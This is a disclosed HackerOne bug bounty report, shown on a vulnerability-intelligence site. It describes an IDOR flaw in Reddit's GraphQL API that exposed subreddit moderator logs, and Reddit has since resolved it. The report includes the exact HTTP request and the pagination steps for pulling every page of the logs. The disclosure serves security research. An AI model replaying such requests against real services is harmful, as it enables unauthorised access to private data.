Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Getting access of mod logs from any public or restricted subreddit with IDOR vulnerability

High
R
Reddit
Submitted None
Actions:
View on HackerOne
Reported by high_ping_ninja

Vulnerability Details

Technical details and impact analysis

Insecure Direct Object Reference (IDOR)
## Summary: There's no check if the user is moderator of the particular subreddit or not while trying to access the mod logs via gql.reddit.com by using operation id. You can change the parameter **subredditName** to any target subreddit name which is public or restricted and get access to mod logs of that subreddit. ## Steps To Reproduce: + Log into any account as an attacker and get the authorization token + Send request given below at gql.reddit.com ``` POST / HTTP/2 Host: gql.reddit.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 62 X-Reddit-Compression: 1 Origin: https://www.reddit.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Authorization: Bearer ourtoken Referer: https://www.reddit.com/ Te: trailers {"id":"6243efcbc61d","variables":{"subredditName":"any-subreddit"}} ``` The response will look something like below {F1851522} + It only gives one page of logs.Look at the response and see if the value of **hasNextPage** is true or false. If It's false then there are no more logs other than the ones we got + If it's true then there are more logs and we can get them by just adding new variable **after** and assigning value of **endCursor**, which we can see in the reponse body of our request {F1851533} + Final request body will look something like this ``` {"id":"6243efcbc61d","variables":{"subredditName":"any-subreddit", "after":"code-from-endCursor" }} ``` + After sending the request we'll get second page of logs. If we still get **hasNextPage** as true, Keep doing this untill we see **hasNextPage** set to false in the response. by doing this we can get all the pages of mod logs one by one. > Use this script to make things easier in confirming this vulnerability (F1851561) > The output will get stored in mod_log_out.txt in the same directory * [attachment / reference] F1851522 F1851533 F1851561 ## Impact Confidential information getting exposed.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$5000.00

Submitted

Weakness

Insecure Direct Object Reference (IDOR)